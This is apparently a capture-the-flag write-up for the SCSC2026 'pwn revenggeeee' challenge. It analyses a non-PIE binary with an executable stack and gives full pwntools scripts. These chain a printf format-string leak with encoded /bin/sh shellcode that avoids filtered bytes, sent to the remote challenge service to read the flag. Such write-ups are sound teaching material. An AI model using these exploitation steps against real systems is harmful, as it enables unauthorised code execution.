SCSC2026 Final - pwn revenggeeee - Binary Exploitation Writeup

Flag: SCSC26{my_old_chall_on_r3v3ng33333_nice_c4tch_b7w}

Description: port 6662

The challenge gave one amd64 ELF and a remote service. First checks showed a non-PIE binary with no canary and an executable stack.

1
file '/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o'

1
/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o: ELF 64-bit LSB executable, x86-64, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, not stripped

1
stat -c '%s %F %y' '/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o'

1
16144 regular file 2026-05-16 15:39:24.605327985 +0700

1
checksec --file='/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o'

1
RELRO: Partial RELRO
2
Stack: No canary found
3
NX: NX unknown - GNU_STACK missing
4
PIE: No PIE (0x400000)
5
Stack: Executable
6
RWX: Has RWX segments

Symbols named the important functions. main reads 0x100 bytes into a 0x50 byte stack buffer, then runs check_badchars before returning.

1
nm -n '/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o'

1
0000000000401156 T setup
2
00000000004011b7 T check_badchars
3
0000000000401247 T main

1
objdump -d -Mintel '/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o'

1
main:
2
  sub rsp,0x50
3
  read(0, rbp-0x50, 0x100)
4
  check_badchars(buf, nread)
5
  leave; ret
6
check_badchars blocks bytes: 0x90, 0x2f, 0x0f

The error string in .rodata matched the byte filter. Raw /bin/sh amd64 shellcode contains / and syscall bytes, so it would be killed by check_badchars.

1
objdump -s -j .rodata '/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o'

1
.rodata: "[-] Security alert! Bad character '\x%02x' detected!"

A short crash test confirmed saved RIP offset 88.

1
from pwn import *
2

3
p = process('/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o')
4
p.send(b'A'*88+b'BBBBBBBB')
5
p.wait()
6
print('exit', p.poll())

1
SIGSEGV, confirms saved RIP offset 88.

There was no useful jmp rsp or syscall gadget in the file, so the exploit used the executable stack. Stage one returned into printf with the stack buffer as the format string, then returned to main. That leaked a stack pointer.

1
from pwn import *
2

3
elf=ELF('/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o', checksec=False)
4
fmt=b'%p.'*12
5
stage1=fmt.ljust(88,b'A')+p64(elf.plt['printf'])+p64(elf.sym['main'])
6
p=process(elf.path)
7
p.send(stage1)
8
out=p.recvuntil(b'A'*20, timeout=1)
9
print(out)

1
0x68.(nil).0x2000.(nil).(nil).0x7ffe33d5af48.0x133d5ae80.0x401247.(nil)...

Local gdb correlation gave leak - second_stage_buffer = 0x168 and ret target = second_stage_buffer + 96. The remote stack layout differed by 0x10, so the final script tried 0x168 and 0x178. It used pwntools’ encoder to build shellcode with none of 0x90, 0x2f, 0x0f, 0x00, or newline.

1
from pwn import *
2
context.clear(arch='amd64')
3
from pwnlib.encoders.encoder import encode
4

5
elf=ELF('/home/LIGHT/Downloads/SCSC2026Final/pwnpwnclub_newest.o', checksec=False)
6
sc=encode(asm(shellcraft.sh()), avoid=b'\x90/\x0f\x00\x0a')
7
fmt=b'%p.'*12
8
stage1=fmt.ljust(88,b'A')+p64(elf.plt['printf'])+p64(elf.sym['main'])
9

10
for diff in [0x168,0x178]:
11
    io=remote('43.128.69.211',6662,timeout=4)
12
    io.send(stage1)
13
    out=io.recvuntil(b'A'*16,timeout=4)
14
    leak=int(out.split(b'.')[5],16)
15
    target=leak-diff+96
16
    payload=b'B'*88+p64(target)+sc
17
    io.send(payload)
18
    io.sendline(b'echo MARKER; /bin/cat /flag 2>/dev/null; /bin/cat flag.txt 2>/dev/null; exit')
19
    data=io.recvall(timeout=2)
20
    print(diff, data)

1
Diff 0x178: AAAAAAAAAAAAAAAAAAAAMARKER
2
SCSC26{my_old_chall_on_r3v3ng33333_nice_c4tch_b7w}